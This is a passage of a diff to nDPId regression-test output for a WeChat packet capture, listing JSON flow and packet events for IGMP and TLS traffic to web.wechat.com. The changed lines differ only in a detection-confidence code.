00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1492167422952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167422952,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KNBAAEAGqhvAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT2SvQAAAQEICgAw\/kAycps2"} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1492167440370,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167440370,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9gAAAEC8bPAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} -00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1492167440984,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167440984,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPkAAAECRRTAqAFk4AAAFpQEAAAiAOwAAAAAAQIAAADv\/\/\/9"} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1492167443647,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167443647,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPoAAAECRRPAqAFk4AAAFpQEAAAiAPsBAAAAAQIAAADgAAD8"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1492167444467,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167444467,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPwAAAECRRHAqAFk4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1492167449288,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167449288,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167452759,"flow_last_seen":1492167452759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167452759,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1492167452759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167452759,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XuFAAEAGtlvAqAFny82XotNTAbtWrkW6AAAAAKACchAjbQAAAgQFtAQCCAoAMRtbAAAAAAEDAwc="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167453010,"flow_last_seen":1492167453010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167453010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1492167453010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453010,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8DstAAEAGBnLAqAFny82XotNUAbuiFhVRAAAAAKACchAILgAAAgQFtAQCCAoAMRuaAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1492167453125,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453125,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701NWIPBqVq5Fu6ASN8jLwAAAAgQFoAQCCApF0gWaADEbWwEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1492167453125,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453125,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XuJAAEAGtmLAqAFny82XotNTAbtWrkW7ViDwa4AQAOUxAAAAAQEICgAxG7dF0gWa"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1492167453357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453357,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701Rfi5PhohYVUqASN8gDZQAAAgQFoAQCCApF0gXVADEbmgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1492167453357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453357,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsxAAEAGBnnAqAFny82XotNUAbuiFhVSX4uT4oAQAOVoqQAAAQEICgAxG\/FF0gXV"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454457,"flow_last_seen":1492167454457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454457,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1492167454457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454457,"pkt":"8IQvSpdgeJKcD6iOCABFAAA86XpAAEAGK8LAqAFny82XotNVAbue7PR+AAAAAKACchAqvwAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454458,"flow_last_seen":1492167454458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1492167454458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cSZAAEAGpBbAqAFny82XotNWAbsdO2wiAAAAAKACchA0zAAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 